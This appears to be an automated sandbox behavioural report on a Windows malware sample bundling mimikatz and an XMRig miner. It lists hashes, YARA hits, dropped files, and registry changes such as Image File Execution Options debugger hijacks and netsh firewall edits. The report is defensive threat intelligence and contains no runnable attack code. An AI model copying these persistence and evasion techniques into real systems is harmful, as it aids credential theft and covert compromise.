Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
28-09-2024 00:22
Behavioral task
behavioral1
Sample
2024-09-28_882b186344a5dd4ddebf50c5fdfb6e59_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-09-28_882b186344a5dd4ddebf50c5fdfb6e59_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-09-28_882b186344a5dd4ddebf50c5fdfb6e59_hacktools_icedid_mimikatz.exe
-
Size
9.4MB
-
MD5
882b186344a5dd4ddebf50c5fdfb6e59
-
SHA1
ef08c692b4222ceb7a10afb4600acfdd1592e764
-
SHA256
ac57fcb3a8fccb9fe4f71b30373685b9ad76c68e32c32857fba4f59038e497aa
-
SHA512
4d612d23ffe71b795e7dce339c193eb0c04c84fa57ea29fd290165d2a9fd7554a037858c0b82add42d9bb299ddd10e2fed05d3dc217449e50c05db70dee81787
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4584 created 2076 4584 qwnumhl.exe 37 -
Contacts a large (20495) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/908-182-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp xmrig behavioral2/memory/908-186-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp xmrig behavioral2/memory/908-203-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp xmrig behavioral2/memory/908-216-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp xmrig behavioral2/memory/908-225-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp xmrig behavioral2/memory/908-236-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp xmrig behavioral2/memory/908-249-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp xmrig behavioral2/memory/908-258-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp xmrig behavioral2/memory/908-279-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp xmrig behavioral2/memory/908-389-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/4260-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4260-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023447-5.dat mimikatz behavioral2/memory/2848-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4408-138-0x00007FF6A1090000-0x00007FF6A117E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts qwnumhl.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts qwnumhl.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe qwnumhl.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2036 netsh.exe 4928 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 2848 qwnumhl.exe 4584 qwnumhl.exe 4240 wpcap.exe 4440 tthiuhlym.exe 4408 vfshost.exe 2692 yntccnlcc.exe 3116 xohudmc.exe 2520 rwdxsq.exe 908 muckuc.exe 1520 yntccnlcc.exe 3812 yntccnlcc.exe 552 qwnumhl.exe 4568 yntccnlcc.exe 4748 yntccnlcc.exe 4576 yntccnlcc.exe 1708 yntccnlcc.exe 1844 yntccnlcc.exe 3260 yntccnlcc.exe 1140 yntccnlcc.exe 3564 yntccnlcc.exe 3948 yntccnlcc.exe 3148 yntccnlcc.exe 3864 yntccnlcc.exe 4552 yntccnlcc.exe 1216 yntccnlcc.exe 4212 yntccnlcc.exe 656 yntccnlcc.exe 4464 pbeymirqp.exe 5020 qwnumhl.exe -
Loads dropped DLL 12 IoCs
pid Process 4240 wpcap.exe 4240 wpcap.exe 4240 wpcap.exe 4240 wpcap.exe 4240 wpcap.exe 4240 wpcap.exe 4240 wpcap.exe 4240 wpcap.exe 4240 wpcap.exe 4440 tthiuhlym.exe 4440 tthiuhlym.exe 4440 tthiuhlym.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 76 ifconfig.me 77 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE qwnumhl.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\rwdxsq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 qwnumhl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE qwnumhl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies qwnumhl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 qwnumhl.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\rwdxsq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft qwnumhl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData qwnumhl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content qwnumhl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 qwnumhl.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache qwnumhl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE qwnumhl.exe -
resource yara_rule behavioral2/files/0x00070000000234a0-134.dat upx behavioral2/memory/4408-135-0x00007FF6A1090000-0x00007FF6A117E000-memory.dmp upx behavioral2/memory/4408-138-0x00007FF6A1090000-0x00007FF6A117E000-memory.dmp upx behavioral2/memory/2692-142-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/files/0x00070000000234ab-141.dat upx behavioral2/memory/2692-157-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/files/0x00070000000234a8-164.dat upx behavioral2/memory/908-165-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp upx behavioral2/memory/1520-171-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/3812-179-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/908-182-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp upx behavioral2/memory/4568-184-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/908-186-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp upx behavioral2/memory/4748-189-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/4576-193-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/1708-197-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/1844-201-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/908-203-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp upx behavioral2/memory/3260-206-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/1140-210-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/3564-214-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/908-216-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp upx behavioral2/memory/3948-219-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/3148-223-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/908-225-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp upx behavioral2/memory/3864-228-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/4552-231-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/1216-233-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/4212-235-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/908-236-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp upx behavioral2/memory/656-238-0x00007FF624650000-0x00007FF6246AB000-memory.dmp upx behavioral2/memory/908-249-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp upx behavioral2/memory/908-258-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp upx behavioral2/memory/908-279-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp upx behavioral2/memory/908-389-0x00007FF7C22A0000-0x00007FF7C23C0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\ebieqpcpt\UnattendGC\specials\libxml2.dll qwnumhl.exe File created C:\Windows\bcmpheym\schoedcl.xml qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\AppCapture32.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\spoolsrv.exe qwnumhl.exe File created C:\Windows\ebieqpcpt\Corporate\mimidrv.sys qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\trfo-2.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\zlib1.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\vimpcsvc.xml qwnumhl.exe File created C:\Windows\ebieqpcpt\Corporate\vfshost.exe qwnumhl.exe File opened for modification C:\Windows\ebieqpcpt\wckmimpgz\Packet.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\spoolsrv.xml qwnumhl.exe File opened for modification C:\Windows\bcmpheym\svschost.xml qwnumhl.exe File created C:\Windows\ime\qwnumhl.exe qwnumhl.exe File opened for modification C:\Windows\bcmpheym\schoedcl.xml qwnumhl.exe File created C:\Windows\ebieqpcpt\upbdrjv\swrpwe.exe qwnumhl.exe File opened for modification C:\Windows\ebieqpcpt\Corporate\log.txt cmd.exe File created C:\Windows\bcmpheym\qwnumhl.exe 2024-09-28_882b186344a5dd4ddebf50c5fdfb6e59_hacktools_icedid_mimikatz.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\libeay32.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\posh-0.dll qwnumhl.exe File created C:\Windows\bcmpheym\vimpcsvc.xml qwnumhl.exe File created C:\Windows\ebieqpcpt\wckmimpgz\tthiuhlym.exe qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\cnli-1.dll qwnumhl.exe File opened for modification C:\Windows\bcmpheym\docmicfg.xml qwnumhl.exe File created C:\Windows\ebieqpcpt\wckmimpgz\scan.bat qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\docmicfg.xml qwnumhl.exe File created C:\Windows\bcmpheym\docmicfg.xml qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\AppCapture64.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\Corporate\mimilib.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\svschost.xml qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\spoolsrv.xml qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\tucl-1.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\xdvl-0.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\docmicfg.exe qwnumhl.exe File opened for modification C:\Windows\bcmpheym\spoolsrv.xml qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\crli-0.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\ucl.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\wckmimpgz\wpcap.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\svschost.exe qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\svschost.xml qwnumhl.exe File opened for modification C:\Windows\bcmpheym\qwnumhl.exe 2024-09-28_882b186344a5dd4ddebf50c5fdfb6e59_hacktools_icedid_mimikatz.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\tibe-2.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\vimpcsvc.exe qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\schoedcl.xml qwnumhl.exe File created C:\Windows\ebieqpcpt\wckmimpgz\Packet.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\trch-1.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\vimpcsvc.xml qwnumhl.exe File created C:\Windows\ebieqpcpt\wckmimpgz\ip.txt qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\schoedcl.exe qwnumhl.exe File created C:\Windows\bcmpheym\spoolsrv.xml qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\Shellcode.ini qwnumhl.exe File opened for modification C:\Windows\ebieqpcpt\wckmimpgz\Result.txt pbeymirqp.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\exma-1.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\ssleay32.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\docmicfg.xml qwnumhl.exe File opened for modification C:\Windows\bcmpheym\vimpcsvc.xml qwnumhl.exe File created C:\Windows\bcmpheym\svschost.xml qwnumhl.exe File created C:\Windows\ebieqpcpt\wckmimpgz\wpcap.exe qwnumhl.exe File created C:\Windows\ebieqpcpt\wckmimpgz\pbeymirqp.exe qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\specials\coli-0.dll qwnumhl.exe File created C:\Windows\ebieqpcpt\UnattendGC\schoedcl.xml qwnumhl.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4992 sc.exe 2096 sc.exe 4040 sc.exe 444 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 